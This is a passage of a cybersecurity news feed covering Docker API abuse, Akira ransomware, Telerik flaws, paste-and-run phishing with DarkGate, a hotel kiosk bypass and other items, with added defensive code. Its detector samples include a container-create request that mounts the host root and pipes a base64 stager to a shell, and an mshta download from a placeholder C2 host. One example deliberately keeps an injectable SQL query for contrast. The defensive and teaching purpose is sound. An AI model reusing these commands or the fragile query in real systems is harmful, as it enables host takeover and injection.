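    {"dst_port": 2375, "path": "/v1.43/containers/create",
     "user_agent": "Docker-Client/24.0.7 (linux)",
     "body": json.dumps({
         "Image": "cmd.cat/chattr",
         "HostConfig": {"Binds": ["/:/hs", "/var/run/docker.sock:/var/run/docker.sock"]},
         "Cmd": ["sh", "-c", f"chroot /hs sh -c 'echo {STAGER_B64} | base64 -d | sh'"],
     })},
    {"dst_port": 80, "path": "/", "user_agent": "HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)"},
    {"dst_port": 1219},
    {"dst_port": 2375, "path": "/v1.43/containers/create",
     "user_agent": "Docker-Client/24.0.7 (linux)",
     "body": json.dumps({"Image": "nginx:1.25",
                         "HostConfig": {"Binds": ["/srv/site:/usr/share/nginx/html:ro"]}})},
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        print(idx, found)
```

The last sample event is a legitimate container create with an ordinary bind, so it is reported only as API activity; the bind-mount and chroot findings fire on the host root and the Docker socket, which no workload container needs. Decoding the base64 stager in the finding is what turns a vague "encoded command seen" alert into something a responder can act on.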
To prevent such attacks, organizations should adhere to Docker security best practices, including:
  • Properly configuring Docker containers and APIs, and in particular never exposing the Remote API on the network without TLS and client authentication.
  • Utilizing only official or certified Docker images.
  • Running containers with non-root privileges.
  • Limiting container access to trusted sources.
  • Regularly performing security audits and scanning for suspicious docker containers.
The researchers have additionally shared a more detailed list of indicators of compromise (IOCs) to help detect infections. The Commando Cat campaign underscores the risks of exposed Docker Remote API servers and the potential for threat actors to abuse open-source projects.

Akira Ransomware Group Claims Attack on Panasonic Australia; Singapore Tells Victims to Not Pay Ransom

By: Alan J
7 June 2024 at 16:06

Panasonic Australia Akira ransomware group

The Akira ransomware group claims on its dark web leak site to have compromised data from Panasonic Australia. Shortly after that announcement, Singapore authorities issued an advisory telling affected companies not to heed the group's demands, after local law firm Shook Lin & Bok confirmed it had been struck by the group. Panasonic Australia is a regional subsidiary of Panasonic Holdings Corporation, headquartered in Japan. It manufactures electronic equipment and devices such as cameras, home appliances, audio equipment, personal care devices, power tools, and air conditioning. The Akira ransomware group has previously targeted several high-profile organizations, netting millions in ransom payments from its victims.

Akira Ransomware Group Attack on Panasonic Australia

The ransomware group alleged that it had exfiltrated sensitive project information and business agreements from the electronics manufacturer Panasonic Australia. No sample documents were posted to support the breach claims. The impact on Panasonic Australia is unknown, but if the claims are genuine the loss of confidentiality over the stolen documents could present a serious liability for the company.

Cyber Security Agency of Singapore Issues Advisory

Singapore's Cyber Security Agency (CSA), together with the country's Personal Data Protection Commission (PDPC), issued an advisory instructing organizations to report Akira ransomware attacks to the relevant authorities rather than pay ransom demands. The advisory was released shortly after the Akira attack on the law firm Shook Lin & Bok. While the firm continued to operate as normal, it had reportedly paid a ransom of US$1.4 million in Bitcoin to the group. According to a SuspectFile report, the group had originally demanded US$2 million, which was negotiated down over the course of a week. The CSA stated that it was aware of the incident and had offered assistance to the law firm, but cautioned other victims against making similar payments. "Paying the ransom does not guarantee that the data will be decrypted or that threat actors will not publish your data," the agency stated. "Furthermore, threat actors may see your organisation as a soft target and strike again in the future. This may also encourage them to continue their criminal activities and target more victims." The Singaporean authorities offered a number of recommendations to organizations:
  • Enforce strong password policies with at least 12 characters, using a mix of upper and lower case letters, numbers, and special characters.
  • Implement multi-factor authentication for all internet-facing services, such as VPNs and critical system accounts.
  • Use reputable antivirus or anti-malware software to detect ransomware through real-time monitoring of system processes, network traffic, and file activity. Configure the software to block suspicious files, prevent unauthorized remote connections, and restrict access to sensitive files.
  • Periodically scan systems and networks for vulnerabilities and apply the latest security patches promptly, especially for critical functions.
  • Migrate from unsupported applications to newer alternatives.
  • Segregate networks to control traffic flow between sub-networks to limit ransomware spread. Monitor logs for suspicious activities and carry out remediation measures as needed.
  • Conduct routine backups following the 3-2-1 rule: keep three copies of backups, store them in two different media formats, and store one set off-site.
  • Conduct incident response exercises and develop business continuity plans to improve readiness for ransomware attacks.
  • Retain only essential data and minimize the collection of personal data to reduce the impact of data breaches.
"Organisations should periodically scan their systems and networks for vulnerabilities and regularly update all operating systems, applications, and software by applying the latest security patches promptly, especially for functions critical to the business," the police, CSA and PDPC said in a joint statement. The group had previously drawn the attention of other governments and security agencies, with the FBI and CISA releasing a joint cybersecurity advisory on Akira as part of the #StopRansomware effort.

University of Arkansas Leads Initiative to Improve Security of Solar Inverters

By: Alan J
7 June 2024 at 10:35

University of Arkansas Solar Initiative Solar Panels

The University of Arkansas is spearheading a new collaborative effort with researchers and industry partners to address the rising risks associated with the deployment of solar systems. Historically, little attention has been paid to the risks within solar systems, as they were not commonly deployed and most solar inverters were not connected to wider networks. The risks grow, however, as more solar panels are installed and inverters become more advanced. Solar inverters act as the interface between solar panels and the grid, and newer models allow remote monitoring and control. Inverters that are not updated or adequately secured could be compromised and manipulated by attackers, allowing them to run malicious code that could spread into the larger power system.

University of Arkansas Solar Inverter Cybersecurity Initiative

The new project led by the University of Arkansas is funded by the U.S. Department of Energy's Solar Energy Technologies Office (SETO) and aims to strengthen the cybersecurity of solar inverters. Solar inverters convert the direct current (DC) generated by solar panels into the alternating current (AC) used in households and on the grid. The effort involves collaboration among multiple universities, laboratories, and industry partners to develop custom-designed controls with multiple layers of cybersecurity protections.

[Image: University of Arkansas solar inverter cybersecurity initiative. Source: news.uark.edu]

Researchers from these groups dismantled conventional commercial solar inverters, stripping away the existing controls and technology. They then integrated work from the different partners while implementing custom-designed controls built with multiple additional layers of cybersecurity protections. The University of Arkansas group then took the modified inverters to solar farms to subject them to real-world conditions and demonstrate the practicality of the cybersecurity measures. The collaborative partners for this project include the University of Georgia, Texas A&M Kingsville, University of Illinois Chicago, Argonne National Laboratory, National Renewable Energy Laboratory, General Electric Research, Ozarks Electric, and Today's Power Inc. These collaborative efforts are a further step toward fortifying not only the cybersecurity resilience of solar inverters but also the broader landscape of renewable energy technologies.

Securing Renewable Energy and Electric Grids

As electric grids become increasingly digitized and connected, securing them has become a top priority for the U.S. Department of Energy (DOE). The department has stated that while some cyberattacks target information technology (IT) systems, attacks on operational technology (OT) devices such as solar photovoltaic inverters could have physical consequences, such as loss of power or fires. The department cited an incident in March 2019 in which attackers breached a utility's web portal firewall. The attack caused intermittent loss of operator visibility into segments of the grid over a period of 10 hours. The DOE's Solar Energy Technologies Office (SETO) is working to ensure that the electric grid is secure and capable of integrating more solar power systems and other distributed energy resources. The office developed a roadmap for photovoltaic cybersecurity, supports ongoing efforts on Distributed Energy Resources (DER) cybersecurity standards, and participates in the Office of Energy Efficiency and Renewable Energy's Cybersecurity Multiyear Program Plan, along with the DOE's broader cybersecurity research activities. SETO has recommended a dynamic survival strategy based on defense-in-depth measures that function as additional layers of security protecting individual components as well as entire systems. These layers include installing anti-virus software on DER systems (solar inverters and battery controllers) and maintaining virus protection and detection mechanisms on the firewalls and servers that integrate these individual systems into the broader grid operation. The office acknowledges that implementing this strategy in DER technologies can be complex, since different owners, operators, and systems are typically involved, but maintains that the strategy is important in mitigating potential cyberattacks.

Patch Now! Center for Cybersecurity Belgium Warns About Critical Vulnerabilities in Telerik Report Server

By: Alan J
6 June 2024 at 18:41

Progress Telerik Belgium Cybersecurity Vulnerabilities

On March 20, 2024, Progress Software disclosed three vulnerabilities in its Telerik Report Server and Telerik Reporting products, identified as CVE-2024-1800, CVE-2024-1801, and CVE-2024-1856. A fourth Telerik Report Server vulnerability (CVE-2024-4358), disclosed on May 31, 2024, could allow attackers to execute code on systems running affected versions of the software, particularly when chained with the earlier deserialization flaw. The Centre for Cybersecurity Belgium (CCB) has issued a security advisory urging customers to patch these vulnerabilities.

Progress Telerik Vulnerabilities Overview

The CCB detailed all four vulnerabilities, their associated risks and known working exploits, and provided links with additional details about each one.

Insecure Deserialization Vulnerabilities

The first two vulnerabilities (CVE-2024-1801 and CVE-2024-1856) are insecure deserialization vulnerabilities in Progress Telerik Reporting that attackers could exploit to run arbitrary code. An attacker with local access could exploit CVE-2024-1801, while CVE-2024-1856 may be exploited remotely if specific web application misconfigurations are present.

Remote Code Execution Vulnerability

The third vulnerability (CVE-2024-1800) is an insecure deserialization vulnerability in Progress Telerik Report Server. Successful exploitation could allow remote execution of arbitrary code on affected systems. Report Server versions prior to 2024 Q1 (10.0.24.130) are vulnerable to this issue.

Authentication Bypass Vulnerability

An additional vulnerability, CVE-2024-4358, disclosed later, is an authentication bypass in Telerik Report Server that could allow an unauthenticated attacker to reach restricted functionality. It affects Report Server versions up to 2024 Q1 (10.0.24.305).

Recommended Actions for Telerik Vulnerabilities

The CCB strongly recommends applying, after thorough testing, the latest available Progress Telerik software updates on vulnerable systems. Progress Telerik has explicitly stated that the only way to remediate the three earlier vulnerabilities is to update to the latest available version (10.1.24.514). For the authentication bypass (CVE-2024-4358), Progress has published a temporary mitigation: a URL Rewrite rule in IIS that denies access to the vulnerable "startup/register" path. The CCB urges organizations to bolster their monitoring and detection capabilities so that any malicious activity associated with these vulnerabilities is caught. Organizations are further advised to check the user list within Report Server for any unauthorized accounts that may have been added, and to respond quickly to detected intrusions.
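Two small triage helpers, added here as an example and not vendor tooling, turn the advisory above into checks an operator can run: one maps an installed Report Server build onto the two CVEs for which the advisory gives version ranges (CVE-2024-1800 fixed in 10.0.24.130, CVE-2024-4358 present up to 10.0.24.305, 10.1.24.514 the current fixed release), and the other inspects a web.config to confirm that an IIS URL Rewrite rule actually blocks the "startup/register" path. The two web.config fragments are constructed for the example, and the rule name in them is invented; the exact rule text Progress published may differ.

```python
"""Triage helpers for the Telerik Report Server advisory above.

Added example, not vendor tooling. Version cut-offs come from the advisory
text; the web.config fragments are constructed to show what an IIS URL Rewrite
block of the startup/register path looks like (rule name is made up).
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

FIXED_RELEASE = (10, 1, 24, 514)            # build Progress says remediates all four
CVE_2024_1800_FIRST_FIXED = (10, 0, 24, 130)
CVE_2024_4358_LAST_AFFECTED = (10, 0, 24, 305)
AUTH_BYPASS_PATH = "startup/register"
BLOCKING_ACTIONS = {"CustomResponse", "AbortRequest"}


def parse_version(version: str) -> Tuple[int, ...]:
    """'10.0.24.305' -> (10, 0, 24, 305); rejects anything that is not dotted integers."""
    if not re.fullmatch(r"\d+(\.\d+)*", version):
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(part) for part in version.split("."))


def affected_report_server_cves(version: str) -> List[str]:
    """Which of the two Report Server CVEs with published version ranges apply."""
    v = parse_version(version)
    cves = []
    if v < CVE_2024_1800_FIRST_FIXED:
        cves.append("CVE-2024-1800")
    if v <= CVE_2024_4358_LAST_AFFECTED:
        cves.append("CVE-2024-4358")
    return cves


def needs_update(version: str) -> bool:
    """True unless the installed build is at or past the fixed release."""
    return parse_version(version) < FIXED_RELEASE


def has_startup_register_block(web_config_xml: str) -> bool:
    """True if a URL Rewrite rule matches the startup/register path and blocks it.

    IIS applies the <match url> pattern as a regex (case-insensitive unless
    ignoreCase="false") to the request path without its leading slash, so the
    check evaluates the pattern the same way rather than looking for a literal.
    """
    root = ET.fromstring(web_config_xml)
    for rule in root.iter("rule"):
        match = rule.find("match")
        action = rule.find("action")
        if match is None or action is None:
            continue
        pattern = match.get("url", "")
        if not pattern:
            continue
        flags = re.IGNORECASE if match.get("ignoreCase", "true").lower() == "true" else 0
        if re.search(pattern, AUTH_BYPASS_PATH, flags) and action.get("type") in BLOCKING_ACTIONS:
            return True
    return False


# Constructed web.config fragments for the example.
UNMITIGATED_WEB_CONFIG = """<configuration>
  <system.webServer>
    <rewrite><rules/></rewrite>
  </system.webServer>
</configuration>"""

MITIGATED_WEB_CONFIG = """<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="Block startup register (example)" stopProcessing="true">
          <match url="^startup/register" ignoreCase="true" />
          <action type="CustomResponse" statusCode="404"
                  statusReason="Not Found" statusDescription="Not Found" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>"""

if __name__ == "__main__":
    for ver in ("10.0.23.1114", "10.0.24.305", "10.1.24.514"):
        print(ver, affected_report_server_cves(ver), "update needed:", needs_update(ver))
    print("mitigation present:", has_startup_register_block(MITIGATED_WEB_CONFIG))
```

The rewrite rule is a stop-gap that hides one path; it does nothing for the deserialization flaws, which is why needs_update() still returns True for a mitigated 10.0.24.305 install. Run the config check again after any deployment that regenerates web.config, since a redeploy can silently drop the rule.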

Researchers Warn About Phishing Emails That Trick Users Into Pasting Malicious Commands

By: Alan J
6 June 2024 at 16:12

Ctrl+V Phishing Campaign cybersecurity

Security researchers have uncovered a new phishing campaign that tricks recipients into pasting (Ctrl+V) and executing malicious commands on their own systems. It leverages a multi-stage attack chain along with what the researchers have dubbed the "paste and run" technique.

'Paste and Run' Phishing Technique

The attackers behind the campaign send emails purporting to be from legitimate businesses or organizations. Researchers from AhnLab stated that these emails typically concern topics such as fee processing or operational instructions, to entice recipients into opening the attached files. The attachment's purpose is disguised, as in the examples below.

[Image: Phishing Ctrl+V email examples. Source: asec.ahnlab.com]

Once the victim opens the HTML attachment, a fake message is displayed in the browser disguised as a Microsoft Word document. It directs the user to click a "How to fix" button that purports to help load the document offline. Clicking the button places a malicious command on the clipboard and shows a set of instructions telling the user to press [Win+R], then [Ctrl+V], and then [Enter].

[Image: Instructions shown after the "How to fix" button. Source: asec.ahnlab.com]

The button may alternatively show a different set of instructions directing the user to open a Windows PowerShell terminal manually and right-click inside the window, which pastes the clipboard contents. Either way, by following the instructions the victim unwittingly pastes the malicious script into the terminal, where it executes.

Phishing Scheme Installs DarkGate Malware

The PowerShell script downloaded and executed by the scheme is a component of the DarkGate malware family. Once the script is run, it downloads and executes an HTA (HTML Application) file from a remote command-and-control server. The HTA file then executes additional instructions to launch an AutoIt3.exe file while passing a malicious AutoIt script (script.a3x) as an argument. The script appears to load the DarkGate malware to infect the system while also clearing the user's clipboard to conceal the execution of malicious commands. "The overall operation flow from the reception of the email to the infection is quite complex, making it difficult for users to detect and prevent," the researchers noted.

(Figure: overall flow of the Ctrl+V phishing chain. Source: asec.ahnlab.com)
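The two sections above describe a chain with three observable stages on the endpoint: PowerShell launched from the shell with a pasted command, mshta.exe fetching an HTA from a remote server, and AutoIt3.exe running a .a3x script. The following added example (not AhnLab's code and not part of this article) applies one detection rule per stage to process-creation telemetry and reports when the whole chain appears in a batch. The event format is a simplified, constructed Sysmon-style record with three fields (image, parent image, command line); map your own telemetry onto those fields. Every path, URL and encoded blob in the sample events is a constructed placeholder, not a real indicator.

```python
"""Detect the paste-and-run -> HTA -> AutoIt process chain in process events.

Added example. Events are constructed, Sysmon-like records reduced to the
three fields the rules need. Sample values are placeholders, not real IoCs.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent process
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _powershell_from_shell(e: ProcEvent) -> bool:
    """PowerShell started directly from explorer.exe (the Win+R and Start
    menu path) with an encoded or hidden-window command, as a pasted
    one-liner would be. A bare interactive PowerShell does not match."""
    if _basename(e.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    if _basename(e.parent_image) != "explorer.exe":
        return False
    cl = " " + e.command_line.lower() + " "
    encoded = re.search(r"\s-(e|ec|enc|encodedcommand)\s", cl) is not None
    hidden = re.search(r"\s-w(indowstyle)?\s+hidden\s", cl) is not None
    return encoded or hidden


def _remote_hta(e: ProcEvent) -> bool:
    """mshta.exe given a remote URL instead of a local .hta file."""
    return (_basename(e.image) == "mshta.exe"
            and re.search(r"https?://", e.command_line, re.IGNORECASE) is not None)


def _autoit_script(e: ProcEvent) -> bool:
    """The AutoIt interpreter run with a compiled .a3x script argument."""
    return _basename(e.image) == "autoit3.exe" and ".a3x" in e.command_line.lower()


RULES = [
    ("powershell_from_shell_encoded_or_hidden", _powershell_from_shell),
    ("mshta_remote_hta", _remote_hta),
    ("autoit_a3x_script", _autoit_script),
]


def detect(events) -> list:
    """Return (event_index, rule_label) pairs for every matching event."""
    hits = []
    for i, e in enumerate(events):
        for label, pred in RULES:
            if pred(e):
                hits.append((i, label))
    return hits


def full_chain_present(events) -> bool:
    """True when every stage of the described chain appears in the batch."""
    seen = {label for _, label in detect(events)}
    return all(label in seen for label, _ in RULES)


# Constructed sample telemetry. The -enc blob is base64 of the ASCII text
# "PLACEHOLDER", not a real command; the host name is a reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              "powershell.exe -w hidden -enc UExBQ0VIT0xERVI="),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "mshta.exe http://c2.example.invalid/placeholder.hta"),
    ProcEvent(r"C:\Users\Public\AutoIt3.exe",
              r"C:\Windows\System32\mshta.exe",
              r"AutoIt3.exe C:\Users\Public\script.a3x"),
    # Benign: a user opens PowerShell normally from the Start menu.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              "powershell.exe"),
    # Benign: a scheduled task runs a script file, not an encoded blob.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for idx, label in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
    print("full chain:", full_chain_present(SAMPLE_EVENTS))
```

The first rule is the one most worth tuning: PowerShell with a parent of explorer.exe is common, so the encoded or hidden-window condition is what separates a pasted lure from an administrator opening a console. The other two stages (mshta.exe with a URL, AutoIt3.exe with a .a3x argument) are rare enough in most fleets that each hit merits a look on its own, and `full_chain_present` is the higher-confidence signal for the campaign described here.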

Protecting Against the Phishing Campaign

The researchers advised email recipients to remain cautious when handling unsolicited emails, even if they appear to be from legitimate sources, to avoid falling victim to the phishing campaign. Recipients should refrain from opening attachment files or clicking on links until they can verify the email sender and its content. "Users must take extra caution when handling files from unknown sources, especially the URLs and attachments of emails," the researchers emphasized. Additionally, recipients should be wary of any messages that prompt them to execute commands, as this is a common tactic used by attackers to compromise systems. Upon receiving such requests, it is recommended to either ignore the email or report it to your organization's IT security team. The researchers also shared various indicators of compromise (IOCs), such as Base64-encoded PowerShell commands, HTA files, AutoIt scripts, download URLs, file signatures and behavioral indicators associated with the campaign.

Researchers Accidentally Discover Bypass in Self-Service Check-In System of Hotel

By: Alan J
6 June 2024 at 10:54


Researchers observed a kiosk mode bypass vulnerability in a remote hotel's check-in terminal during their stay there while traveling to attend a threat modeling workshop. The hotel's terminal operates through the Ariane Allegro Scenario Player. Ariane is an international provider of self-check-in systems for the hospitality industry, deployed at more than 3,000 sites across 25 different countries. The researchers discovered the flaw in the check-in system's guest search feature, which could be made to crash in a way that allowed unauthorized access to the underlying system.

Kiosk Mode Bypass Grants Access To Hotel's Windows Desktop

The hotel, which had no check-in staff, relied solely on the self-service check-in terminal running the Ariane Allegro Scenario Player in kiosk mode. Visiting researchers from Pentagrid discovered that the check-in terminal crashed when a single quote character was entered into its guest search feature. Upon trying to interact with the terminal screen after the crash, the Windows operating system asks the user whether it should wait longer or stop the running task. Selecting the second option halts the kiosk mode application entirely, unexpectedly giving the team access to the underlying Windows desktop. The researchers credit the accidental discovery of the flaw to Martin "O'YOLO" Schobert.

The researchers state that this bypass poses significant risks, as attackers with access to the Windows desktop could potentially target a hotel's entire network, access stored data (including PII, reservations, and invoices), or create room keys for other hotel rooms by exploiting its RFID room-provisioning functionality. The kiosk mode bypass vulnerability has been rated with a CVSS score of 6.8 (medium). The researchers specified the following preconditions as necessary for successful exploitation of the vulnerability:
  • Physical access to the check-in terminal along with time, depending upon the attack's preparation.
  • The check-in terminal must be in a self-service state, as hotels might enable this option only during specific times or during staff shortage.
According to Ariane Systems, the issue stemmed from the use of outdated versions of its check-in software at the new hotel.
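The article reports only that a single quote in the guest search crashed the kiosk application; it does not say why. The following added example (not Ariane's code, and not a claim about the cause of this flaw) assumes one common way such a crash arises, a search query assembled by string concatenation, and places it beside the parameterized form that treats the quote as ordinary data, plus a top-level wrapper that keeps a search error from escaping the kiosk process at all. The guest table is constructed in-memory sample data.

```python
"""Guest search that survives a single quote, beside the fragile version.

Added example. The assumed cause (string-built SQL) is an illustration of
how an input character can become an unhandled error; the article does not
name the kiosk's actual defect. Sample data is constructed.
"""
import sqlite3


def _sample_db() -> sqlite3.Connection:
    """Constructed in-memory guest table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE guests (id INTEGER PRIMARY KEY, name TEXT, room TEXT)")
    conn.executemany(
        "INSERT INTO guests (name, room) VALUES (?, ?)",
        [("Ada Example", "101"), ("Bob O'Sample", "102"), ("Cy Test", "201")],
    )
    conn.commit()
    return conn


def search_guests_fragile(conn, needle: str) -> list:
    """String-built query: a quote inside `needle` becomes SQL syntax and the
    statement fails. Left unhandled, that is the kind of error that takes a
    kiosk application down and exposes whatever is underneath it."""
    sql = "SELECT name, room FROM guests WHERE name LIKE '%" + needle + "%'"
    return conn.execute(sql).fetchall()


def search_guests_safe(conn, needle: str) -> list:
    """Parameterized query: the quote is just a character in the pattern."""
    sql = "SELECT name, room FROM guests WHERE name LIKE ?"
    return conn.execute(sql, ("%" + needle + "%",)).fetchall()


def fragile_raises(conn, needle: str) -> bool:
    """True when the string-built query fails for this input."""
    try:
        search_guests_fragile(conn, needle)
        return False
    except sqlite3.Error:
        return True


def kiosk_search(conn, needle: str) -> list:
    """Entry point a kiosk UI would call. Two defences stack here: the safe
    query, and a catch-all so that even an unexpected database error yields
    an empty result instead of an unhandled exception at process level."""
    try:
        return search_guests_safe(conn, needle)
    except sqlite3.Error:
        # Log for operators and stay inside the locked-down UI.
        return []


if __name__ == "__main__":
    db = _sample_db()
    print("safe, O'S      :", search_guests_safe(db, "O'S"))
    print("fragile, quote :", "error" if fragile_raises(db, "'") else "ok")
    print("kiosk, quote   :", kiosk_search(db, "'"))
```

The second defence matters for kiosks specifically: the article's bypass needed only that the application stop responding so Windows offered to end the task, so a kiosk process should treat any unhandled exception in its UI loop as a bug to be caught, logged and recovered from, independently of fixing the individual query.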

Disclosure Process and Vendor Response

The vulnerability's discovery led the team to investigate further, finding that a hotel chain from Liechtenstein and Switzerland uses the check-in terminal at its smaller hotel locations. The vulnerability could potentially affect several hotels that rely on Ariane's Allegro Scenario Player check-in system.

The researchers first discovered the vulnerability on March 5, 2024, and immediately attempted to disclose it to the vendor through multiple channels, such as LinkedIn, contact numbers and official email addresses. The researchers also attempted to reach the company's technical leader and chief product officer, receiving a delayed response on March 18 in which Ariane Systems claimed that the reported systems were legacy software models and that no personally identifiable information (PII) or exploitable data could be retrieved from the kiosk machine. However, the researchers dispute the vendor's claim, stating that the kiosk was designed to produce and keep accessible invoice files. In a later call with Ariane Systems on April 11, further vulnerability details were shared, with the researchers awaiting a response. They state that as of June 5, 2024, there have been no updates from the vendor. They cite the initial delays and lack of further updates as reasons for publicly disclosing the vulnerability after a waiting period of 90 days.

To mitigate potential risks stemming from the vulnerability, the researchers recommended that hotels using the Ariane Allegro Scenario Player check that they have the most recent version of the software installed, as the issue was reportedly fixed by the vendor. Additionally, they advised hotels to isolate check-in terminals to prevent potential bypasses that could allow attackers to compromise hotel networks or underlying Windows systems.

Researcher Develops 'TotalRecall' Tool That Can Extract Data From Microsoft Recall

By: Alan J
5 June 2024 at 19:15


While Microsoft's forthcoming Recall feature has already sparked security and privacy concerns, the tech giant attempted to downplay those reactions by stating that collected data would remain on the user's device. Despite this reassurance, concerns remain, as researchers - including the developer of a new tool dubbed "TotalRecall" - have observed various inherent vulnerabilities in the local database maintained by Recall, lending credibility to critics of Microsoft's implementation of the AI tool.

TotalRecall Tool Demonstrates Recall's Inherent Vulnerabilities

Recall is a new Windows AI tool planned for Copilot+ PCs that captures screenshots of the user's device every five seconds and stores the data in a local database. The tool's announcement, however, led many to fear that this process would make sensitive information on devices susceptible to unauthorized access. TotalRecall, a new tool developed by Alex Hagenah and named after the 1990 sci-fi film, highlights the potential compromise of this stored information. Hagenah states that the local database is unencrypted and stores data in plain text format. The researcher likened Recall to spyware, calling it a "Trojan 2.0."

TotalRecall was designed to extract and display all the information stored in the Recall database, pulling out screenshots, text data, and other sensitive information, highlighting the potential for abuse by criminal hackers or domestic abusers who may gain physical access to a device. Hagenah's concerns are echoed by others in the cybersecurity community, who have also compared Recall to spyware or stalkerware. Recall captures screenshots of everything displayed on a user's desktop, including messages from encrypted apps like Signal and WhatsApp, websites visited, and all text shown on the PC. TotalRecall can locate and copy the Recall database, parse its data, and generate summaries of the captured information, with features for date range filtering and term searches. Hagenah stated that by releasing the tool on GitHub, he aims to push Microsoft to fully address these security issues before Recall's launch on June 18.

Microsoft Recall Privacy and Security Concerns

Cybersecurity researcher Kevin Beaumont has also developed a website for searching Recall databases, though he has withheld its release to give Microsoft time to make changes. Microsoft's privacy documentation for Recall mentions the ability to disable screenshot saving, pause Recall on the system, filter out applications, and delete data. Nonetheless, the company acknowledges that Recall does not moderate the captured content, which could include sensitive information like passwords, financial details and more. The risks extend beyond individual users, as employees under "bring your own device" policies could leave with significant amounts of company data saved on their laptops.

The UK's data protection regulator has requested more information from Microsoft regarding Recall and its privacy implications. Amid criticism over recent hacks affecting US government data, Microsoft CEO Satya Nadella has emphasized the company's need to prioritize security. However, the issues surrounding Recall demonstrate that security concerns were not given sufficient attention, and they necessitate inspection of its data collection practices before its official release.

U.S. Navy Punishes Senior Enlisted Leader for Operating Wi-Fi Network On Ship

By: Alan J
5 June 2024 at 17:15


The U.S. Navy took action against a senior enlisted leader who installed an unauthorized Wi-Fi system aboard a combat ship. According to documents obtained by the Navy Times, Grisel Marrero, the former command senior chief of the littoral combat ship USS Manchester's gold crew, pleaded guilty in March to charges related to the operation of the illicit network and a subsequent cover-up. The network appears to have been set up through the use of a Starlink satellite connected to the ship.

U.S. Navy Chief Attempted to Cover Up Illicit Network

The U.S. Navy began investigating the ship's network installation in June 2023 when a crew member attempted to report the network to the ship's commanding officer. However, Marrero intercepted the tip before it was sent and avoided sharing information about the deployment of the Wi-Fi network. The installation was eventually uncovered in August after Marrero edited an image of the ship's Starlink data usage to conceal the Wi-Fi network's activity. Prosecutors believe Marrero attempted this operation to impede pending disciplinary action against another sailor. It is unclear if the sailor was involved with the operation of the Wi-Fi network.

Marrero, who had a background in Navy intelligence, was relieved of her leadership position aboard the Manchester in September 2023 due to a "loss of confidence," the Navy's Surface Force Pacific (SURFPAC) command said in a statement. The phrase "loss of confidence" is commonly used as a euphemism among military branches to announce that enlisted officers and senior leaders have been relieved of their duty while avoiding specific details about the performance or misconduct behind the decision. Marrero later faced a court-martial, where she pleaded guilty to willful dereliction of duty and making false statements to her superiors. She was also demoted from the E-8 rank to E-7 as punishment.

Other U.S. Sailors Implicated in the Wi-Fi Scandal

The Navy has also disciplined other sailors in connection with the illegal Wi-Fi network. While details of their involvement are scarce, a spokesperson for the Navy confirmed that other sailors were also punished for their role in the operation of the illicit network. The extent of their punishments is not yet clear, as the spokesman declined to provide further details.

The Manchester's gold crew has faced significant changes in the past year, with Marrero and the ship's second-in-command, Cmdr. Matthew Yokeley, both being relieved of their duties. The Manchester, which was in or around San Diego, Hawaii and Guam during Marrero's alleged deeds, is a littoral combat ship assigned to SURFPAC, part of the U.S. Pacific Fleet. The reasons for Yokeley's ouster are unclear, and SURFPAC officials have declined to provide further details. In previous official press releases relating to the dismissal of Navy officers for unspecified reasons, such as the relieving of Commodore Richard A. Zaszewski in March 2024 and Commodore James Harne in December 2023, the Navy often made the following statement:
Navy leaders are held to high standards of personal and professional conduct. They are expected to uphold the highest standards of responsibility, reliability, and leadership, and the Navy holds them accountable when they fall short of those standards.
This incident serves as a reminder of the security concerns stemming from the use of unauthorized networks or digital communications while operating in official military or Navy duty. An official press release from the Navy, along with further information on other punishments involved with the unauthorized network, is expected in the coming months.

Google Announces Investment in 15 New Cybersecurity Clinics Across the U.S.

By: Alan J
5 June 2024 at 12:12


Google has announced a new initiative to establish 15 cybersecurity clinics across the US. The move attempts to address escalating cybersecurity threats as well as the additional risks and opportunities presented by bleeding-edge technology such as AI. These clinics aim to provide funding, mentorship, and additional resources to higher education institutions in the area of cybersecurity. The initiative expects that growing a skilled and dedicated cybersecurity workforce will help protect critical infrastructure and organizations and help address the cybersecurity skills shortage.

Cybersecurity Clinics Aim At Building Resilient Workforce

The cybersecurity clinic initiative, launched in collaboration with the Consortium of Cybersecurity Clinics, invites higher education institutions to apply for funding to establish new clinics. Approved clinics will receive $1 million in cybersecurity funding, mentorship, Titan Security Keys (phishing-resistant 2FA keys), and scholarships for Google's Cybersecurity Certification. Mentorship from these clinics is intended to bridge academic knowledge and real-world application by allowing students to gain important hands-on experience. The clinics will also help regional organizations protect themselves from potential cyber threats. For example, Indiana University cybersecurity clinic students have been helping the local fire department devise contingency plans for online communications compromise scenarios. At the Rochester Institute of Technology, students helped their local water authority review and improve its IT security configurations across operating sites. Google's collaboration page lists the institutions through which the new cybersecurity clinics will be set up, marking them as 'New Grantees':
  • Tougaloo College
  • Turtle Mountain Community College
  • University of Hawaiʻi Maui College
  • Cyber Center of Excellence (CCOE), San Diego State University (SDSU), California State University San Marcos (CSUSM) and National University
  • West Virginia State University
  • Dakota State University
  • University of North Carolina Greensboro
  • University of Arizona
  • Franklin Cummings Tech
  • Spelman College
  • NSI CTC - HUSB
  • Northeastern State University in Oklahoma
  • Trident Technical College
  • Eastern Washington University
  • The University of Texas at El Paso
These new clinics join the ten clinics already operating under existing grants at the following institutions:

